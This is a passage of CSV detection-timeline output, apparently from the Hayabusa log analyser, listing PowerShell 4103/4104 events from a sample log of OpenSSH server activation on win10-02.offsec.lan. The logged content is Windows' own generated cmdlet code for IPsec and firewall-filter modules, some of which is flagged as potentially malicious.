$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject'))",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{ foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.216 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.216 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.216 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.217 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.220 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.221 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.221 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.221 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.222 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.250 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.250 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 